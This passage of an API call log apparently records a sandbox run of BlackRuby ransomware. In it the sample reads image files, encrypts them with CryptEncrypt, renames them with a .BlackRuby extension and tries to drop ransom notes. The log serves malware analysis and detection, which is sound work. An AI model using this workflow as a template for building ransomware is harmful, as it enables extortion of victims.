lpFileSizeHigh=0x18eddc*=0x0) returned 0xf4f9 [0060.949] GetLastError () returned 0x0 [0060.949] ReadFile (in: hFile=0x258, lpBuffer=0x1b41b74, nNumberOfBytesToRead=0xf4f9, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b41b74*, lpNumberOfBytesRead=0x18ed84*=0xf4f9, lpOverlapped=0x0) returned 1 [0060.949] GetLastError () returned 0x0 [0060.950] CloseHandle (hObject=0x258) returned 1 [0060.950] GetLastError () returned 0x0 [0060.950] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg", lpFilePart=0x0) returned 0x28 [0060.950] GetLastError () returned 0x0 [0060.950] SetErrorMode (uMode=0x1) returned 0x0 [0060.950] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\v0ddhuzsb0.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x266929f0, ftCreationTime.dwHighDateTime=0x1d34cee, ftLastAccessTime.dwLowDateTime=0x2472dc70, ftLastAccessTime.dwHighDateTime=0x1d34e94, ftLastWriteTime.dwLowDateTime=0x2472dc70, ftLastWriteTime.dwHighDateTime=0x1d34e94, nFileSizeHigh=0x0, nFileSizeLow=0xf4f9)) returned 1 [0060.950] GetLastError () returned 0x0 [0060.950] SetErrorMode (uMode=0x0) returned 0x1 [0060.950] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c818) returned 1 [0060.950] GetLastError () returned 0x0 [0060.984] CryptImportKey (in: hProv=0x37c818, pbData=0x1bba910, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360f60) returned 1 [0060.984] GetLastError () returned 0x0 [0060.984] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.984] GetLastError () returned 0x0 [0060.989] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.989] GetLastError () returned 0x0 [0060.989] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360fa0) returned 1 [0060.989] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.989] GetLastError () returned 0x0 [0060.989] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1be795c*=0x1, dwFlags=0x0) returned 1 [0060.989] GetLastError () returned 0x0 [0060.990] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1be7928, dwFlags=0x0) returned 1 [0060.990] GetLastError () returned 0x0 [0060.990] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1be79a4*, pdwDataLen=0x18ed74*=0xf5f0, dwBufLen=0xf5f0 | out: pbData=0x1be79a4*, pdwDataLen=0x18ed74*=0xf5f0) returned 1 [0060.990] GetLastError () returned 0x0 [0060.990] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c065b0*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c065b0*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.990] GetLastError () returned 0x0 [0060.990] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c065e0*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c065e0*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.990] GetLastError () returned 0x0 [0060.991] CryptDestroyKey (hKey=0x360f60) returned 1 [0060.991] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.991] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.991] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg", lpFilePart=0x0) returned 0x28 [0060.991] GetLastError () returned 0x0 [0060.991] SetErrorMode (uMode=0x1) returned 0x0 [0060.991] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\v0ddhuzsb0.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.992] GetLastError () returned 0xb7 [0060.992] GetFileType (hFile=0x258) returned 0x1 [0060.992] SetErrorMode (uMode=0x0) returned 0x1 [0060.992] GetFileType (hFile=0x258) returned 0x1 [0060.994] CloseHandle (hObject=0x258) returned 1 [0060.994] GetLastError () returned 0xb7 [0060.994] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg", lpFilePart=0x0) returned 0x28 [0060.994] GetLastError () returned 0xb7 [0060.994] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_UiDhmqf9m5Aw6AmlZanwcnLcud34gHvBTLFXE2ezi45.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_UiDhmqf9m5Aw6AmlZanwcnLcud34gHvBTLFXE2ezi45.BlackRuby", lpFilePart=0x0) returned 0x59 [0060.994] GetLastError () returned 0xb7 [0060.994] SetErrorMode (uMode=0x1) returned 0x0 [0060.994] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\v0ddhuzsb0.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x266929f0, ftCreationTime.dwHighDateTime=0x1d34cee, ftLastAccessTime.dwLowDateTime=0x2472dc70, ftLastAccessTime.dwHighDateTime=0x1d34e94, ftLastWriteTime.dwLowDateTime=0x2c8c1040, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xf600)) returned 1 [0060.994] GetLastError () returned 0xb7 [0060.994] SetErrorMode (uMode=0x0) returned 0x1 [0060.994] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\v0ddhuzsb0.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_UiDhmqf9m5Aw6AmlZanwcnLcud34gHvBTLFXE2ezi45.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_uidhmqf9m5aw6amlzanwcnlcud34ghvbtlfxe2ezi45.blackruby")) returned 1 [0060.995] GetLastError () returned 0xb7 [0060.996] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.996] GetLastError () returned 0xb7 [0060.996] SetErrorMode (uMode=0x1) returned 0x0 [0060.996] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.996] GetLastError () returned 0x5 [0060.997] SetErrorMode (uMode=0x0) returned 0x1 [0060.997] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp", lpFilePart=0x0) returned 0x28 [0060.997] GetLastError () returned 0x5 [0060.997] SetErrorMode (uMode=0x1) returned 0x0 [0060.997] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\wp awtsywb.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1c32ce4 | out: lpFileInformation=0x1c32ce4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f2d5310, ftCreationTime.dwHighDateTime=0x1d356e7, ftLastAccessTime.dwLowDateTime=0xf4c05b40, ftLastAccessTime.dwHighDateTime=0x1d35273, ftLastWriteTime.dwLowDateTime=0xf4c05b40, ftLastWriteTime.dwHighDateTime=0x1d35273, nFileSizeHigh=0x0, nFileSizeLow=0x12036)) returned 1 [0060.997] GetLastError () returned 0x5 [0060.997] SetErrorMode (uMode=0x0) returned 0x1 [0060.997] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp", lpFilePart=0x0) returned 0x28 [0060.997] GetLastError () returned 0x5 [0060.997] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp", lpFilePart=0x0) returned 0x28 [0060.997] GetLastError () returned 0x5 [0060.997] SetErrorMode (uMode=0x1) returned 0x0 [0060.997] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\wp awtsywb.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.997] GetLastError () returned 0x0 [0060.997] GetFileType (hFile=0x258) returned 0x1 [0060.997] SetErrorMode (uMode=0x0) returned 0x1 [0060.998] GetFileType (hFile=0x258) returned 0x1 [0060.998] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x12036 [0060.998] GetLastError () returned 0x0 [0060.998] ReadFile (in: hFile=0x258, lpBuffer=0x1c34aac, nNumberOfBytesToRead=0x12036, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c34aac*, lpNumberOfBytesRead=0x18ed84*=0x12036, lpOverlapped=0x0) returned 1 [0060.999] GetLastError () returned 0x0 [0060.999] CloseHandle (hObject=0x258) returned 1 [0060.999] GetLastError () returned 0x0 [0060.999] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp", lpFilePart=0x0) returned 0x28 [0060.999] GetLastError () returned 0x0 [0060.999] SetErrorMode (uMode=0x1) returned 0x0 [0060.999] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\wp awtsywb.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f2d5310, ftCreationTime.dwHighDateTime=0x1d356e7, ftLastAccessTime.dwLowDateTime=0xf4c05b40, ftLastAccessTime.dwHighDateTime=0x1d35273, ftLastWriteTime.dwLowDateTime=0xf4c05b40, ftLastWriteTime.dwHighDateTime=0x1d35273, nFileSizeHigh=0x0, nFileSizeLow=0x12036)) returned 1 [0060.999] GetLastError () returned 0x0 [0060.999] SetErrorMode (uMode=0x0) returned 0x1 [0061.009] CryptImportKey (in: hProv=0x37c790, pbData=0x1cb2ec0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360aa0) returned 1 [0061.009] GetLastError () returned 0x0 [0061.009] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.009] GetLastError () returned 0x0 [0061.014] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.014] GetLastError () returned 0x0 [0061.015] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e60) returned 1 [0061.015] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.015] GetLastError () returned 0x0 [0061.015] CryptSetKeyParam (hKey=0x360e60, dwParam=0x4, pbData=0x1cdff0c*=0x1, dwFlags=0x0) returned 1 [0061.015] GetLastError () returned 0x0 [0061.015] CryptSetKeyParam (hKey=0x360e60, dwParam=0x1, pbData=0x1cdfed8, dwFlags=0x0) returned 1 [0061.015] GetLastError () returned 0x0 [0061.015] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cdff54*, pdwDataLen=0x18ed74*=0x12130, dwBufLen=0x12130 | out: pbData=0x1cdff54*, pdwDataLen=0x18ed74*=0x12130) returned 1 [0061.015] GetLastError () returned 0x0 [0061.015] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d041e0*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d041e0*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0061.015] GetLastError () returned 0x0 [0061.015] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d04210*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d04210*, pdwDataLen=0x18ed94*=0x10) returned 1 [0061.015] GetLastError () returned 0x0 [0061.016] CryptDestroyKey (hKey=0x360aa0) returned 1 [0061.016] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.016] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.016] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp", lpFilePart=0x0) returned 0x28 [0061.016] GetLastError () returned 0x0 [0061.016] SetErrorMode (uMode=0x1) returned 0x0 [0061.017] GetFileType (hFile=0x258) returned 0x1 [0061.017] GetFileType (hFile=0x258) returned 0x1 [0061.019] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Wp AwTSyWB.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\wp awtsywb.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_zs3SySjokx5Z2NV76pb4uZP8VBXliF3gdOFdatlJUNH.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_zs3sysjokx5z2nv76pb4uzp8vbxlif3gdofdatljunh.blackruby")) returned 1 [0061.020] GetLastError () returned 0xb7 [0061.023] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0061.023] GetLastError () returned 0xb7 [0061.023] SetErrorMode (uMode=0x1) returned 0x0 [0061.023] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.023] GetLastError () returned 0x5 [0061.024] SetErrorMode (uMode=0x0) returned 0x1 [0061.025] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp", lpFilePart=0x0) returned 0x27 [0061.025] GetLastError () returned 0x5 [0061.025] SetErrorMode (uMode=0x1) returned 0x0 [0061.025] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\yhbnq4zpz.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1b34848 | out: lpFileInformation=0x1b34848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56414ae0, ftCreationTime.dwHighDateTime=0x1d34fb9, ftLastAccessTime.dwLowDateTime=0xb74fa6b0, ftLastAccessTime.dwHighDateTime=0x1d3529d, ftLastWriteTime.dwLowDateTime=0xb74fa6b0, ftLastWriteTime.dwHighDateTime=0x1d3529d, nFileSizeHigh=0x0, nFileSizeLow=0x9a67)) returned 1 [0061.025] GetLastError () returned 0x5 [0061.025] SetErrorMode (uMode=0x0) returned 0x1 [0061.025] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp", lpFilePart=0x0) returned 0x27 [0061.025] GetLastError () returned 0x5 [0061.025] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp", lpFilePart=0x0) returned 0x27 [0061.025] GetLastError () returned 0x5 [0061.025] SetErrorMode (uMode=0x1) returned 0x0 [0061.025] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\yhbnq4zpz.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.025] GetLastError () returned 0x0 [0061.025] GetFileType (hFile=0x258) returned 0x1 [0061.025] SetErrorMode (uMode=0x0) returned 0x1 [0061.025] GetFileType (hFile=0x258) returned 0x1 [0061.025] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x9a67 [0061.025] GetLastError () returned 0x0 [0061.026] ReadFile (in: hFile=0x258, lpBuffer=0x1b36624, nNumberOfBytesToRead=0x9a67, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b36624*, lpNumberOfBytesRead=0x18ed84*=0x9a67, lpOverlapped=0x0) returned 1 [0061.027] GetLastError () returned 0x0 [0061.027] CloseHandle (hObject=0x258) returned 1 [0061.028] GetLastError () returned 0x0 [0061.028] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp", lpFilePart=0x0) returned 0x27 [0061.028] GetLastError () returned 0x0 [0061.028] SetErrorMode (uMode=0x1) returned 0x0 [0061.028] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\yhbnq4zpz.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56414ae0, ftCreationTime.dwHighDateTime=0x1d34fb9, ftLastAccessTime.dwLowDateTime=0xb74fa6b0, ftLastAccessTime.dwHighDateTime=0x1d3529d, ftLastWriteTime.dwLowDateTime=0xb74fa6b0, ftLastWriteTime.dwHighDateTime=0x1d3529d, nFileSizeHigh=0x0, nFileSizeLow=0x9a67)) returned 1 [0061.028] GetLastError () returned 0x0 [0061.028] SetErrorMode (uMode=0x0) returned 0x1 [0061.028] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0061.028] GetLastError () returned 0x0 [0061.063] CryptImportKey (in: hProv=0x37c790, pbData=0x1ba3e94, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360f20) returned 1 [0061.063] GetLastError () returned 0x0 [0061.063] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.063] GetLastError () returned 0x0 [0061.068] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.068] GetLastError () returned 0x0 [0061.068] CryptDuplicateKey (in: hKey=0x360f20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x3609e0) returned 1 [0061.068] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.068] GetLastError () returned 0x0 [0061.068] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1bd0ee0*=0x1, dwFlags=0x0) returned 1 [0061.068] GetLastError () returned 0x0 [0061.068] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1bd0eac, dwFlags=0x0) returned 1 [0061.068] GetLastError () returned 0x0 [0061.068] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd0f28*, pdwDataLen=0x18ed74*=0x9b60, dwBufLen=0x9b60 | out: pbData=0x1bd0f28*, pdwDataLen=0x18ed74*=0x9b60) returned 1 [0061.068] GetLastError () returned 0x0 [0061.068] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1be4614*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1be4614*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0061.068] GetLastError () returned 0x0 [0061.068] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1be4644*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1be4644*, pdwDataLen=0x18ed94*=0x10) returned 1 [0061.068] GetLastError () returned 0x0 [0061.068] CryptDestroyKey (hKey=0x360f20) returned 1 [0061.068] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.068] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.068] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp", lpFilePart=0x0) returned 0x27 [0061.068] GetLastError () returned 0x0 [0061.068] SetErrorMode (uMode=0x1) returned 0x0 [0061.068] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\yhbnq4zpz.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.070] GetLastError () returned 0xb7 [0061.070] GetFileType (hFile=0x258) returned 0x1 [0061.070] SetErrorMode (uMode=0x0) returned 0x1 [0061.070] GetFileType (hFile=0x258) returned 0x1 [0061.073] CloseHandle (hObject=0x258) returned 1 [0061.073] GetLastError () returned 0xb7 [0061.073] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp", lpFilePart=0x0) returned 0x27 [0061.073] GetLastError () returned 0xb7 [0061.073] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_NFsuwnnmYX4ZfmUYvhzJlyaG6hMbU5SYQZd0ONws.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_NFsuwnnmYX4ZfmUYvhzJlyaG6hMbU5SYQZd0ONws.BlackRuby", lpFilePart=0x0) returned 0x56 [0061.073] GetLastError () returned 0xb7 [0061.073] SetErrorMode (uMode=0x1) returned 0x0 [0061.073] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\yhbnq4zpz.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56414ae0, ftCreationTime.dwHighDateTime=0x1d34fb9, ftLastAccessTime.dwLowDateTime=0xb74fa6b0, ftLastAccessTime.dwHighDateTime=0x1d3529d, ftLastWriteTime.dwLowDateTime=0x2c97f720, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x9b70)) returned 1 [0061.073] GetLastError () returned 0xb7 [0061.073] SetErrorMode (uMode=0x0) returned 0x1 [0061.073] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\YhbNQ4Zpz.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\yhbnq4zpz.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_NFsuwnnmYX4ZfmUYvhzJlyaG6hMbU5SYQZd0ONws.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_nfsuwnnmyx4zfmuyvhzjlyag6hmbu5syqzd0onws.blackruby")) returned 1 [0061.074] GetLastError () returned 0xb7 [0061.074] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0061.074] GetLastError () returned 0xb7 [0061.074] SetErrorMode (uMode=0x1) returned 0x0 [0061.074] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.074] GetLastError () returned 0x5 [0061.075] SetErrorMode (uMode=0x0) returned 0x1 [0061.075] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ", lpFilePart=0x0) returned 0x2a [0061.075] GetLastError () returned 0x5 [0061.075] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0061.075] GetLastError () returned 0x5 [0061.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0061.075] GetLastError () returned 0x5 [0061.075] GetFullPathNameW (in: 